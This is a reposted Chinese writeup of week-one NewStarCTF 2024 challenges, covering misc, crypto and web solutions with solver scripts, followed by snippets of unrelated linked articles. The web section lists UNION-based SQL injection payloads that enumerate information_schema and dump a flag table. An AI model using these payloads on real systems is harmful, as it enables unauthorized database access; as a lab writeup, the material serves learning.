NewStarCtf 2024第一周writeup(部分)

news/2024/10/8 10:37:28/文章来源:https://www.cnblogs.com/hanna-ov0/p/18451078

是公开赛道的菜狗,web有两道题没做出来,pwn和reverse不会,主打一个写都写了记录下吧。

Signin

操作内容:做选择题得出flag。

flag值:

flag{I_Agr3e_to_FoL10w_th3_ru1es_c41fa97d}

MISC 兑换码

操作内容:

题目提示flag在图片下方,010修改图片宽度,得到flag。

flag值:

flag{La_vaguelette}

MISC Labyrinth

操作内容:

题目标有LSB,用工具找到flag。

flag值:

flag{e33bb7a1-ac94-4d15-8ff7-fd8c88547b43}

MISC WhereIsFlag

操作内容:

kali连接上去,ls挨个目录找的。

你们二次元真的……

flag值:

flag{0083b779-1f5b-4c01-be80-8123c9b05b64}

MISC pleasingMusic

操作内容:

听了下音频,有嘟嘟滴滴的声音,感觉是摩斯电码,题目又说正反都好听,所以把音频反向,获取摩斯电码为:./--../..--.-/--/---/.-./..././..--.-/-.-./---/-../.

flag值:

flag{ez_morse_code}

MISC decompress

操作内容:

逐层解压,最后有个文件和一个要解密的压缩包,文件打开是:^([a-z]){3}\d[a-z]$,感觉像是解压密码的正则,盲跑一下解压软件试试。密码是:xtr4m,打开之后好几个flag.zip文件,拿说的正确的flag试试:

flag值:

flag{U_R_th3_ma5ter_0f_dec0mpress}

Crypto Base

操作内容:

3d3d3d感觉是hex编码的=,所以hex解码。然后base32+base64。

flag值:

flag{B@sE_0f_CrYpt0_N0W}

Crypto Xor

操作内容:

异或。

from pwn import xor

from Crypto.Util.number import bytes_to_long,long_to_bytes

key = b'New_Star_CTF'

flag='flag{*******************}'

# flag[:13]:0-12位

m1 = bytes_to_long(bytes(flag[:13], encoding='utf-8'))

m2 = flag[13:]

k1=bytes_to_long(key)

c1= 8091799978721254458294926060841

m1=k1^c1

m1=long_to_bytes(m1)

print(m1)

#'flag{0ops!_yo'

c2= b';:\x1c1<\x03>*\x10\x11u;'

m2=xor(c2,key)

print(m2)

# b'u_know_XOR!}'

# flag{0ops!_you_know_XOR!}

flag值:

flag{0ops!_you_know_XOR!}

Crypto Strange King

操作内容:

看题目感觉是凯撒,但是单纯解密接不出来。

ksjr-->flag,感觉每个间隔分别是5 7 9 11,再结合题目中的每天进步一点,感觉非常合理,所以写代码跑一下。

cypto='ksjr{EcxvpdErSvcDgdgEzxqjql}'

a=5

le="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

i=0

mes=[]

for i in cypto:

if(i in le):

raw_midd=(ord(i))

midd=chr(ord(i)-a)

if raw_midd<97:

if ord(midd)<65:

midd=chr(ord(midd)+26)

else:

if ord(midd)<97 :

midd=chr(ord(midd)+26)

mes.append(midd)

else :

midd=i

mes.append(midd)

a=(a+2)%26

print("".join(str(l) for l in mes))

解出来flag是:flag{PleaseDoNotStopLearing}。

flag值:

flag{PleaseDoNotStopLearing}

Crypto 一眼秒了

操作内容:

是rsa,从网站获取到n的分解,得到p,q。

from Crypto.Util.number import *

from gmpy2 import *

p = 7221289171488727827673517139597844534869368289455419695964957239047692699919030405800116133805855968123601433247022090070114331842771417566928809956044421

q = 7221289171488727827673517139597844534869368289455419695964957239047692699919030405800116133805855968123601433247022090070114331842771417566928809956045093

n=52147017298260357180329101776864095134806848020663558064141648200366079331962132411967917697877875277103045755972006084078559453777291403087575061382674872573336431876500128247133861957730154418461680506403680189755399752882558438393107151815794295272358955300914752523377417192504702798450787430403387076153

c=48757373363225981717076130816529380470563968650367175499612268073517990636849798038662283440350470812898424299904371831068541394247432423751879457624606194334196130444478878533092854342610288522236409554286954091860638388043037601371807379269588474814290382239910358697485110591812060488786552463208464541069

e = 65537

d = gmpy2.invert(e,(p-1)*(q-1))

m = pow(c,d,n)

m =long_to_bytes(m).decode('utf-8',errors='ignore')

print(m)

解出来flag是:flag{9cd4b35a-affc-422a-9862-58e1cc3ff8d2}。

flag值:

flag{9cd4b35a-affc-422a-9862-58e1cc3ff8d2}

Web headach3

操作内容:

打开网页看响应体,在响应头里。

flag值:

flag{You_Ar3_R3Ally_A_9ooD_d0ctor}

Web 会赢吗

操作内容:

  1. /3ntranc3查看页面源代码,获得flag第一部分:ZmxhZ3tXQTB3和/4cqu1siti0n;

  2. 猜想/4cqu1siti0n是另一个页面,打开。

查看页面源代码,尝试构造到/api/flag/4cqu1siti0n的post请求(这里是我猜的)。获得:

"flag":"IV95NF9yM2Fs","nextLevel":"s34l"

  1. /s34l:查看源代码,修改图示部分:

获得第三部分flag:MXlfR3I0c1B和下一阶段:/Ap3x

  1. 查看源代码感觉1部分是关键,要点击2 部分使其生效。<noscript>关闭浏览器的js选项:

获得flag:fSkpKcyF9,下一阶段是空。

(5)组合得到:ZmxhZ3tXQTB3IV95NF9yM2FsMXlfR3I0c1BfSkpKcyF9,base64解密得到flag。

flag值:

flag{WA0w!_y4_r3al1y_Gr4sP_JJJs!}

Web 谢谢皮蛋

操作内容:

看了下是sql注入:

5 union select 1,2#

5 union select database(),2#

5 union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctf'#

5 union select 1,group_concat(column_name) from information_schema.columns where table_schema='ctf' and table_name='Fl4g'#

5 union select 1,group_concat(id) from ctf.Fl4g#

5 union select 1,group_concat(des) from ctf.Fl4g#

5 union select 1,group_concat(value) from ctf.Fl4g#

flag值:

flag{fe3abae7-9010-4fd5-81d5-fc7db01684f0}

Reverse begin

操作内容:

按照步骤操作即可:

4a8ade5760bb56e04a0b157092e3748flag值:

flag{Mak3_aN_3Ff0rt_tO_5eArcH_F0r_th3_f14g_C0Rpse}

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/809836.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

《Programming from the Ground Up》阅读笔记:p147-p180

《Programming from the Ground Up》学习第9天,p147-p180总结,总计34页。 一、技术总结 1.Physical memeory p152, Physical memory refers to the actual RAM chips inside your computer and what they contain. 物理地址指的RAM,即我们买电脑所说的“内存”。 2.Virtual …

labview和QT编程

LabView LabView所面向的并非传统意义上的程序员。他的所有功能都可以通过组合某些组件来完成。程序的流程控制,比如循环之类的也是通过画图一样的操作来做的。 所有的程序功能几乎都可以通过鼠标来构造出来。优点是做一个能运行的程序非常简单。做一个虚拟的仪器很容易。也不…

kitti 数据集 可视化

1. 网址 KITTI官网网址:https://www.cvlibs.net/datasets/kitti/index.php 下载数据集:https://www.cvlibs.net/datasets/kitti/eval_object.php?obj_benchmark=3d KITTI数据集论文:Are we ready for Autonomous Driving? The KITTI Vision Benchmark Suite github可视化代…

table 单元格合并

table 元素合并单元格,用法倒是很简单,但过程中遇到了点小问题,记录下: 1、多行多列合并,使用 rowSpan、colSpan 设置要合并的行列数,再将合并后的多余单元格删除即可:function merge(table, px, py, row, col, remove = true) {py--;let target = table.rows[px].cell…

php网站登录密码忘记了的三种解决办法

如果你忘记了PHP网站的登录密码,可以通过以下三种方法来解决这个问题: 1. 通过数据库直接修改密码 步骤如下:登录数据库:使用命令行工具(如 mysql 或 phpMyAdmin)登录到数据库。 例如,通过命令行登录 MySQL 数据库:mysql -u root -p选择对应的数据库:选择包含用户表的…

还不知道这个原则的程序员,要小心了

“无规矩不成方圆”,来了禅道以后才发现,其实小公司也应该有自己的代码规范。大家好,我是陈哥,今天聊聊规范优先原则 ~背景 前几天,和我同事闲谈,聊到我在来禅道之前参与过的一个项目。当时,小团队对代码规范不够重视,结果合并代码时出现大量格式冲突,解决问题费时费力…

phpinfo函数的作用

phpinfo() 函数是 PHP 中的一个内置函数,主要用于显示关于 PHP 配置的各种信息。这些信息包括 PHP 版本、已加载的扩展、环境变量、HTTP 头信息、目录路径设置等。这对于调试和了解当前 PHP 运行环境非常有用。作用包括:显示 PHP 的版本号。 列出所有已启用的扩展及其版本信息…

宝塔面板打不开怎么办

如果遇到宝塔面板无法打开的问题,可以尝试以下几个步骤来排查和解决问题:检查网络连接确保服务器与客户端之间的网络连接正常,尝试访问其他网站或服务以确认网络状况。查看端口是否开放宝塔面板默认使用的端口号为8888(或自定义端口),确保该端口在服务器防火墙中已经开放…

[Markdown] Markdown 及文档格式转换

1 概述 : Markdown Markdown 的诞生什么是 Markdown? Markdown 的诞生初衷Markdown 是一种用于编写结构化文档的纯文本格式,基于在电子邮件和 usenet 帖子中指示格式的约定。 它由 John Gruber 开发(在 Aaron Swartz 的帮助下),并于 2004 年以 语法描述 和用于将 Markdown…

如果 表名 拼写错误或表不存在,你会看到 #1146 - Table ecms.表名 doesnt exist 的错误

<?php $servername = "localhost"; $username = "your_username"; $password = "your_password"; $dbname = "ecms";// 创建连接 $conn = new mysqli($servername, $username, $password, $dbname);// 检查连接 if ($conn->con…

错误消息:#2002 - Cant connect to local MySQL server through socket /tmp/mysql.sock (2)

错误消息:#2002 - Cant connect to local MySQL server through socket /tmp/mysql.sock (2) 原因:数据库服务未启动。 连接参数错误。解决方法:检查数据库服务:确认 MySQL 服务是否正常运行。sudo service mysql status检查连接参数:确认连接参数(主机名、用户名、密码、…